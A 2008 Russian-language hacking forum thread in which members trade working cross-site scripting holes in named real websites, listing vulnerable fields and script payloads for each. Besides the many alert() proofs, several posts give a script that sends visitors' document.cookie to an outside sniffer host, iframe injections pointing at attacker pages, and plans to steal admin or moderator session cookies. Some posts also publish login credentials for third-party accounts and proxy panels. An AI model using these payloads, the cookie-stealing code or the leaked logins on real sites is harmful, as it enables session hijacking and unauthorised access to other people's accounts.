Например: http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009 (http://www.scandasia.com/viewNews.php?coun_code=dk&news_id=4009)

freddi
14.01.2008, 23:48
mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.


add

сейчас пробовал отправлять файлы типов: jpg xml txt pdf, все прекрасно везде работает %)

SSSetuPPP
15.01.2008, 18:21
должно сработать и в опере(не хочу ставить чтобы проверять)

Я поставил и проверил - не работает. (в IE работает)

iddqd
18.01.2008, 02:08
www.todj.ua - главный клубный портал Украины
В своем профиле, в разделе фото:
topdj.ua/clubbers/ваш_id/photo/
создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется.
Found by: /me

Dreel
19.01.2008, 18:12
Вот моя активная xss:
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Иванов Иван <script>alert(/ xss /)</script>


Заходим на сайт _http://www.virtualflowers.ru/abook.php
Регестрируемся [ регистрация там фуфло какое-то ;) ]
Добавить адресата - в каментах <script>alert(/ Dreel /)</script>


http://www.slando.com.ua/images/slando.gif
Бесплатные объявления Киева

Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель:
<script>alert(/ D /)</script>
Есть один недостаток - максимум 30 символов.

iddqd
20.01.2008, 03:11
ero-club.ru
В своем профиле давим "добавить новое фото" -
создаем новый альбом и в поле"Название" пишем ядовитый код
<script>alert(/iddqd/)</script>

xcedz
20.01.2008, 03:28
http://www.knor.ru/cgi-bin/mag.pl?otziv гостевая полный набор и пасиф и актив

<script>alert(/отжиг/)</script>
зы то что, вчера написано было потерли... а баг видимо не хотят исправлять ну и ладно, я не в обиде, действительно, кому охота копаться в коде, тем более если он не твой :D )

Momiji
22.01.2008, 04:17
http://news.nag.ru/news/root/crnews/
Уязвимы комментарии.
http://news.nag.ru/news/root/crnews/story15827/

SSSetuPPP
22.01.2008, 12:40
народ поскажите что я могу зделать с этой xss тоько в IE пашет?? http://helpdesk.flygroup.st/index.php?="><script>alert(5555)</script>


пробовала это захожу по ссылке() на снифер не чего не приходит в чем может быть проблема?
http://helpdesk.flygroup.st/index.php?="><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>

заранее спасибо

http://s.netsec.ru/регистрируй там сниффер
http://s.netsec.ru/Твой_Логин.gifадрес твоего сниффера

<a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a>вызов по ссылке

<img src="http://s.netsec.ru/Твой_Логин.gif">код HTML

<script>img = new Image(); img.src = "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script>вызов из скрипта

GreenBear
Сниффер от netsec.ru
http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html

•†•SyTiNeR•†•
29.01.2008, 22:41
дико извеняюсь за офф топ достал куки каким образом их использовать если еcть инфа на анти чате дайте ссылочку пожалуйста
:)
Вбей в браузер вроде в Опере есть в настройках куда куки ставлять

it's my
30.01.2008, 15:36
www.shinovozoff.ru - онлайн магазин авто-товаров

http://www.shinovozoff.ru/guestbook/
уязвимы все поля ввода, результат =)

o3,14um
03.02.2008, 05:31
www.jino-net.ru

у себя в контрольной панели в поле подсказка пароля пишешь:
<script>alert(document.cookie)</script>
Затем идёшь восстанавливать пароль:
www.jino-net.ru/lostpass.phtml?login=ЛОГИН
и выскакивает алерт с куками

MaSter GeN
03.02.2008, 21:43
gamer.kraslan.ru

в поле комментов втыкаем

<iframe src= http://you-money.100webspace.net <

рабочая версия

http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791

Momiji
06.02.2008, 22:34
auto05.ru

http://www.auto05.ru/guestbook.html?page=1
Уязвимо поле комментариев.

redyarsk.ru
http://www.redyarsk.ru/gb/index.php?t=1&all=
Уязвимо поле комментариев.

MaSter GeN
18.02.2008, 20:59
уууу блин
http://www.pressofatlanticcity.com

постим коммент к новости

<IMG """><SCRIPT>alert("master gen")</SCRIPT>">
получам
рабочий вариант !
http://www.pressofatlanticcity.com/188/story/84175.html

N1K70
22.02.2008, 11:55
http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303

в заголовке (Subjekti) пишите:

<script>alert(/n1k70/)</script>

Haruka
25.02.2008, 12:03
Вот
http://www.lugarus.com/users/haruka0000/
Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".

it's my
29.02.2008, 10:54
гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
Пишем сообщение уязвимое поле: Heimasíða

imajo.ati
04.03.2008, 16:54
icq.com

план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script>

затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке
http://icq.com/people/full_details_update.php

вылетит куча алертов =)
нужно "помочь" юзеру логиниться за ваш номер.

либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше

MadFun.
11.03.2008, 06:30
Извеняюсь за повторение
www.omen.ru
<script>alert(\'Хss\')</script>
уязвимые поля
Ищу рост от:
Ищу рост до:
Ищу вес от:
Ищу вес до:

ЛифчиС5СВ
12.03.2008, 19:03
www.26thavenue.com

Регимся на форуме:
http://www.26thavenue.com/index.php?action=main.forums
В профайле в поля Location, Interests пишем:
<script>alert("Antichat")</script>

Horsekiller
13.03.2008, 13:52
www.26thavenue.com



Поковырял еще немного.

Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем <script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
"><script>alert()</script>
Забил в гугл powered by bSpeak попробовал в нескольких местах, везде работает.

Кроме этого есть пассивные XSS в этом движке, пример -
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E

или в другом месте -
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E

MaSter GeN
13.03.2008, 18:23
www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс :)
Нужно имять статут зарегенного пользователя
когда герегились постим коммент б блоге типа
<irame src=http://you.site.com/xss.html <

ну и собстевенно создаем у себя страничку с названием xss.html
содержашую
<script>alert(/XSS/)<script>

xcedz
15.03.2008, 03:25
lovas.ru
вообще бараги какие то, не люблю барыг
Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом

напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>
Возможно есть и sql inj

с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost :)

ZET36
16.03.2008, 11:06
bronepoezd.ru

в гостевой в поле сообщение пишем

[.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]

без точек в бб теге

freddi
18.03.2008, 22:12
file.mail.ru
narod.yandex.ru/disk/

заливаем файл со скриптом, который, при открытии файла, выполнится.

Tigger
19.03.2008, 01:54
domex.ru

Уязвимые поля:
Площадь (м2)
Цена


В уязвимых полях пишем: "><script>alert()</script>

xcedz
21.03.2008, 00:55
bloggerswap.com

Заводим акк на этом ресурсе

затем редактируем инфо Edit Account Details

в поле Website Name: добавим наш код:

">'><SCRIPT>alert(4)</SCRIPT> ;) жмем edit my account

xcedz
23.03.2008, 18:00
Выкладывалась как то sql inj ====> equipnet.ru \выкладывал ее не без известный и всеми любимый Дон Карлеоне ;) привет Дон :rolleyes: \

http://www.equipnet.ru/job.php?beg_msg=0&end_msg=25

Добавим новое сообщение

<SCRIPT>alert(/Привет девчонки!/)</SCRIPT>
жертве нужно кликнуть по ссылке моего объявления и куку гриня ;)

+++++++++++++++++++++++++++++++++++

MaSter GeN
24.03.2008, 12:52
ehbsr.com
не люблю я все таки американцев :)
Нужно иметь статус зерегнного пользователя вот:
User:birch64
password:ywrcws
тыкаем мой аккаунт и в поле fist name втыкаем:
<img"""><script>alert(/ЛЯ ПА ПАМ/)</script>

Tigger
26.03.2008, 01:51
Футбольный клуб "Москва"
http://www.fcmoscow.ru/ru/registration
Уязвимые поля:
Фамилия
Имя
Отчество
NickName
Место Жительства
В уязвимых полях пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Луч-Энергия"
www.luch-energy.ru/?search
Уязвимое поле:
Ваш запрос
В уязвимом поле пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Локомотив"
http://www.fclm.ru/s-info-center/
Пишем: "><script>alert()</script>
------------------------------------------------------------------------
Футбольный клуб "Амкар"
http://www.amkar.ru/reg/reg.asp
Уязвимые поля:
Логин
Город
Веб-Сайт
В уязвимых полях пишем: "><script>alert()</script>
Регестрируемся
Заходим
Вылетает Алерт

.Striker
30.03.2008, 16:03
хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт

-------------------------------

"Знаменитый" украинский хотинг файлов upload.com.ua

Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
Получаем активную xss ;)

PS upload уже профиксили :(

Buffalon
30.03.2008, 23:30
http://ul-rocksite.info
Переходит на страницу чата:
http://ul-rocksite.info/index.php?page=chat
И в чате рисуем следующее:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
OPera Версия 9.23

AJAY
31.03.2008, 14:42
хостинг картинок
http://images.i-files.org/

в поле описание пишем
"><script>alert()</script>
загружаем картинку, потом берем Ссылка на изображение:
заходим по ссылке и вылетает алерт

вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)

freddi
08.04.2008, 23:06
mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

freddi
09.04.2008, 00:54
кстате и на forum.lady.mail.ru тоже работает)

DimOnOID
09.04.2008, 01:00
:D Ты забыл про forum.auto.mail.ru
а вапще если немного посмотреть на домена мейла..то можно найти ещё парочку форумов :D

freddi
09.04.2008, 09:33
DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.

-=megahertz=-
14.04.2008, 21:09
Интернет-магазин бытовой техники и электроники
http://www.003.ru/

При регистрации уязвимы поля Фамилия, Имя и Отчество
"<script><alert('xss by megahertz')</script>

echobyte
19.04.2008, 01:04
инет магазин оружия
http://www.kortik.ru/

уязвимы комментарии

пример
http://www.kortik.ru/catalog.php?a=3&id=2641

xcedz
19.04.2008, 03:31
[radikal.ru]


[заводим акк, загружаем картинку, а затем редактируем,
в поле Надпись на фото
вводим ядовитый код ]

">'></title><SCRIPT>alert(/хренкоми/)</SCRIPT>
-----------------------------

xcedz
19.04.2008, 10:34
www.tnd.ru


регимся, затем редактируем свои данные

ну и соответственно внедряем код в следующие поля

http://i007.radikal.ru/0804/e3/5e981d1dd520.jpg

Grey
20.04.2008, 14:24
mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

кстате и на forum.lady.mail.ru тоже работает)

DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.

Еще здесь такой же форум и как следствие тут тоже активная xss в заголовке темы на форуме.

http://forum.deti.mail.ru/

iddqd
24.04.2008, 16:42
[NoNaMe] nnm.ru

Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".

Shred
24.04.2008, 19:04
[NoNaMe] nnm.ru

Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".
во первых ограничение на 30 символов, во-вторых название локи <h1>doc</h1> отобразилось как есть :(

Doom123
26.04.2008, 05:57
http://www.origitea.ru/default.aspx?404;http://www.origitea.ru:80/guest

Визде пишем <script>alert()</script>

Travka
28.04.2008, 20:14
http://memori.ru
регаемся
в поле имя или фамилия пишем
<script>alert()</script>
смотрим профиль

xcedz
28.04.2008, 20:20
www.33hochu.ru

Нашел вначале пассивную

Зарегался думаю может еще что есть интересненькое?

ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код

например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>


можно так "><script>alert(document.cookie)</script>

еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции ;)

http://www.33hochu.ru/antixy

вот что получилось ))
все, работает и в опере и в лисе :)

echobyte
05.05.2008, 19:02
www.pcweek.ru

уязвимы комментарии

пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment

xcedz
07.05.2008, 19:28
хытитипи ввв.stroyazbuka.com/web/registration.php

так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))

так же есть и пассивная. (говорю тока о xss ))) есть и другие темы ;) )

YoYo Factory
11.05.2008, 11:08
http://www.themobstergame.com/ /

Уязвима Регистрация
Ни одно поле не фильтруется

"><script>('XSS')</script>

N1K70
13.05.2008, 11:42
хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>

ДеЦл
13.05.2008, 15:53
ИдиВЖопу.ру

Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:

http://idi-v-zhopu.ru/?166

(с) Лигендо...

xcedz
13.05.2008, 19:41
Заводи ак создаем вакансию. :p

http://www.jobportal.com.ua/vacancy/499117.html

(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)

М.Боярский
18.05.2008, 13:58
Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/

echobyte
23.05.2008, 00:05
Сиськи!
http://hahaha.com.ua/file/54.html

КВР
24.05.2008, 21:57
_http://checkproxy.nnm.netserv.name/
admin
123456

_http://queen-love.com/proxy5/
admin
123456

Юзайте и не просите больше никого о халявных прокси.

echobyte
27.05.2008, 22:42
http://www.panvasoft.com/rus/5452/gb/

sabe
30.05.2008, 21:48
Chronicle.com - Деньги
/forums/index.php?board=[XSS]
/forums/index.php?topic=[XSS]

Kusto
31.05.2008, 02:05
http://www.all-biz.info/ru/

при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0%B1%D0%B0%D0%B C%D1%81%27%29%3C%2Fscript%3E&cs=&ac_category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C

Buffalon
31.05.2008, 16:15
http://o-sport.ru/guestbook/index.php

0Й... .Вводите в гостевой
<script>alert()</script>
и всё

D9D9_VAD9
01.06.2008, 11:12
svadbann.ru

Гостевая книга
http://www.svadbann.ru/q_answer.html

Активны все три поля, сообщение, имя, мыло

echobyte
04.06.2008, 19:58
http://classifieds.invictory.org
уязвимы обьявления

otmorozok428
08.06.2008, 12:55
Сайт Российских Сутенёров

http://www.suter.ru/blacklist.html

POST-форма, поле "Дополнительно:
(краткое описание происшетшего)"

<script>alert("Сайт закрыт за нарушение действующего законодательства Российской Федерации")</script>

fatalo
09.06.2008, 18:15
karaul.ru/
Xss найдена в добавление комментария.
Вот пример:

_http://karaul.ru/30.12.2004/13/comments
_http://karaul.ru/09.06.2008/11/comments
В поле имя вводите стандартное:
<script>alert('antichat.ru')</script>
И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.

fatalo
10.06.2008, 14:45
www.skisport.ru
Оффициальный сайт журанала лыжный спорт.
Пример скрипта:
http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for +antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=
У этого ресурса бажная функция поиска по сайту.
Как обычно пишем:<script>alert('antichat.ru want you!')</script>
И творим добро =)

xcedz
10.06.2008, 18:10
fidep.ru
http://www.idiot.fidep.ru все просто.

MaSTeR GэN
10.06.2008, 23:11
=\ за разделом никто не следит так как они на фик никому не нужны :D к статит это пассивные.
Еманыйрот!
А зря может кто нить научился бы xss различать ;)
vkadre.ru
собственно тыкая создать добавить ролик вбиваем имя
</title><script>alert(/xss/)</script>+
cобственно канает любой тег главное title закрыть ;)

вотс уже рабочий линк
http://vkadre.ru/users/1926899

Кто хорошо подумает может на самом контакте активку найти ;)

xcedz
11.06.2008, 22:02
И снова я

http://www.internetpro.ru/boards/index.php

добавим пару объяв о продаже мопедов? )))))))))

xcedz
11.06.2008, 22:21
http://majordomo.ru/constructor/
Заходим на тестовый акк, удаляется через 20 минут )))

http://iloveru.net/ трут быстро =)

MaSTeR GэN
11.06.2008, 22:48
вообшем то сайт ру подкастинга ;)
rpod.ru

собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент
<iframe src="http://blabla.ru/index.html" <
ну и собственно создаем на домене blabla.ru index.html
c нужным кодом )
рабочий пример с фреймом на гугль.ru )
http://siski-piski-show.rpod.ru/82.html#c110876

xcedz
12.06.2008, 15:04
price.ua
завдоми ак,
поле фио.
усё. =)

Лайт
13.06.2008, 03:53
Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же.
В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее.

Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля.
Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.

xcedz
14.06.2008, 02:02
ловите позитффф

http://blog.meta.ua блоги ;)

как вариант, создаем свое сообщество

http://contact.meta.ua


вообщем есть над чем поразмыслить =\

Лайт
15.06.2008, 00:08
Нашел уязвимость на www.playground.ru
Жмем регистрация и вставляем <script>alert()</script>
Уязвимые поля:
Конфигурация компьютера
Ваш сайт
О себе

Вот моя рега http://users.playground.ru/448520/

Ded MustD!e
15.06.2008, 07:46
Журнал Total Football

http://www.totalfootball.ru

Добавляем комментарий к новости, уязвимы все поля :p

Также присутствует пассивка в поиске, и если поискать sql-inj ;)

Лайт
15.06.2008, 18:24
Случайно нашел доску объявлений.
Уязвимы все комменты к товарам.
http://stolbik.kiev.ua/b5111492.html
А в поиске сидит пассивка:
_http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XS S+from+Light%27%29%3C%2Fscript%3E&group=0&search_butt.x=28&search_butt.y=9

Лайт
15.06.2008, 19:26
Вот еще: http://www.inox.ua/?check=guest_book&lt=1213543321953
Уязвимые поля: Имя, www, сообщение.
Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
В поиске тоже сидит пассивка.

__________
Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...

Лайт
16.06.2008, 05:45
Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168
уязвимым оказалось имя пользователя
ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php

Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0

____________
Админ прикрыл гостевую, наверно фильтр поставит(((

MaSTeR GэN
16.06.2008, 08:15
Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0

хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )

Лайт
16.06.2008, 14:44
хочешь удивиться ? ))) выскакивает alert(document.cookie)
;) просто в куках кроме id cессии не чего нет )
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail.php?ID=6308?add-comment

xcedz
16.06.2008, 15:52
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail.php?ID=6308?add-comment
хотелось секаса с девчиной, а получился xss "активный"(с) :D

Лайт
17.06.2008, 00:40
Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных.
http://www.tabacum.ru/showinfo.php?id=63
Поля: имя и коммент

xcedz
17.06.2008, 05:12
planeta.rambler.ru
Для теста создал два ака.
Создал в одном сообщество. (вот тут первая хцц)
в названии..
(что то типа бла бла бла //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>)

мои настройки: премодерация- включена
участвуют все желающие
писатели- участники
читатели -участники сообщества
эксперты- назначает автор тобишь я
===========
Далее. назначаем эксперта нашего сообщества (пока себя самого) - + добавляем экспертные области опять же внедряем свой код
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ( в приципе можно воспользоваться :) )
=================
теперь вторым аком заходим в наше сообщество и подаем заявку на вступление
=================
ну и попробуем добавить запись в наше сообщество
олерте :D
(ЗЫ акк чела должен быть в ваших друзьях)
=================
поиграйтесь с настройками, может я что то упустил ;)
ъхэк!

MaSTeR GэN
17.06.2008, 17:32
businessweek.com
полезно иногда новости читать ;)
постим коммент к новости

<iframe src=http://ha.ckers.org/scriptlet.html <

содержание scriptlet.html думаю сами понимаете ))
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
воврашаемся обратно по линку с новостью )) вуаля )
для примера вот news ;)
http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+i ndex+page_top+stories

P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )

freddi
17.06.2008, 17:33
fotki.yandex.ru

уязвимо поле "Альбом". ничего не фильтруется.

Лайт
19.06.2008, 07:53
http://www.oke.ru/xo4u.php?id=-42717
Поля имя и мыло

l1ght
25.06.2008, 21:11
комментарии на wiki.xakep.ru собственно пример:
http://wiki.xakep.ru/(S(binh5p451x3ngf45fdpipz55))/fononnyi_kompyuter.ashx?Discuss=1&NoRedirect=1

desTiny
29.06.2008, 15:38
продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..

Заходим в группы и заливаем в файлы html-файл.
Вот пример:
http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWP VPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY

Ъхек :)

xcedz
29.06.2008, 15:40
продолжим с гуглом...
greetz to xcedz, закобяка ты ендакая..

Заходим в группы и заливаем в файлы html-файл.
Вот пример:
http://here-is-xss.googlegroups.com/web/XSS.htm?gda=Z1hfxDgAAAA76U5U5sly8vjF2QR9OTG0MTrRWP VPWrWJTq_RUQGHwWG1qiJ7UbTIup-M2XPURDQUbzuizSHsttw_trxthalY

Ъхек :)
прости друк, я не хотел :(

Kusto
29.06.2008, 23:45
коментарии вот собственно пример
http://www.new-most.info/press-centre/announcements/4508.htm#comment

Блин- в алерте написал Россия-чемпион (сайт был украинский) теперь прежде чем вывесить комент комент пишет что типа ваш комент будет добавлен после проверки модератором)))- а мож это и неплохо совсем- так окажется гарантия если прийдут куки то что куки модера или админа)))

base
30.06.2008, 13:44
ozon.ru
В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
Пример: http://www.ozon.ru/context/detail/id/3819533/

<td colspan="3" align="right" class="vertpadd"
style="padding-right:20px; color:Gray;">Мамедов&nbsp;
(<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>),
Москва<fuck>, 21 год
</td>

BlackSun
30.06.2008, 20:03
Пров Дом.сру, биллинг
http://tmn.citydom.ru/bill/
Активная ксс у операторов в статистике (в забаненных логинах, при большом кол-ве неправильных попыток), уязвимо поле Логин

scrat
03.07.2008, 21:53
moskva.ru - ставим имя <script>alert('xss')</script> заходим в поиск по интересам и вуаля алерт сработал :) чувствую там ещё много багов будет :)

xcedz
10.07.2008, 20:10
Ку! дяди хакеры, снов я - флудер очата:

http://my.mail.ru/mail/sq2inj/

вы должны зайти в свой мир и перейти на мою страничку .
Поскольку сами не дураки то надеюсь догадаетесь как реализовать. ну и еще есть возможность загрузки swf (догадываетесь о чем я?)

чмоке зайки =)

Зы, l1ght- не зачет. не похекерске, а еще ты поддакивалка.

xcedz
11.07.2008, 00:41
ну и еще есть возможность загрузки swf (догадываетесь о чем я?)
Пример
Мейл ру
логинимся и дуем поссылочке
http://music.my.mail.ru/05091c0018001b0512090302061801021405030455515c5355 0750040d0e01035b5554025c000a50595f0755075d000d06.s wf

BlackSun
11.07.2008, 03:46
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-

xcedz
12.07.2008, 15:16
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-
пашет!

пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html

sabe
13.07.2008, 10:12
20minut.ua PR 4
http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )

-=Static=-
17.07.2008, 04:12
_http://www.e-xoopport.it/modules/news/

Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)

BlackSun
19.07.2008, 19:10
NextMail.ru

Активная ксс, старенькая, но ужось, все еще пашет :D

Шлем письмо ..
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>

Dimi4
03.08.2008, 12:50
http://novy.tv/services/chat/
Чат "Нового Канала"

Если кто узнает движок, сообщите плз, такой же у прова стоит...

Регаемся, заходим (visto:visto)

Слева, там где Интонация, выбираем "настройка", добавляем свой вариант - "><script>alert(/Dimi4/)</script>

В меню --- записная книжка --- добавляем запись:

%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e

Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги <b> blabla </b>

BlackSun
04.08.2008, 01:14
iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>

// BlackSun

Frozzeg
04.08.2008, 14:20
krasnodar2000.ru

Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"

Frozzeg
04.08.2008, 14:36
nevasport.ru


Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"

Frozzeg
05.08.2008, 21:15
seonews.ru

Активная XSS в комментах новостей
Уязвимое поле "Имя"

Bonnie and Clyde
07.08.2008, 08:13
Активная XSS в бесплатной почтовой системе NextMail.ru

@nextmail.ru
@nxt.ru
@epage.ru
@email.su
@student.su
@hu2.ru
@xaker.ru
@mail2k.ru
@dezigner.ru
@programist.ru
@onlymail.ru
@logmail.ru

Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код.
(прим.: <script>alert(document.coocke);</script>)

XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)

BlackSun
07.08.2008, 08:31
Bonnie and Clyde, работает и в ие, и в опере, и в фф:
https://forum.antichat.ru/showpost.php?p=779537&postcount=229

mailbrush
08.08.2008, 12:28
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
_http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E

Calcutta
10.08.2008, 14:30
Блог:
http://blogspot.com/

пример первой попавшейся xss. при создании своего блога вписываем алер и:
http://1111vvv.blogspot.com/

NFM
10.08.2008, 21:28
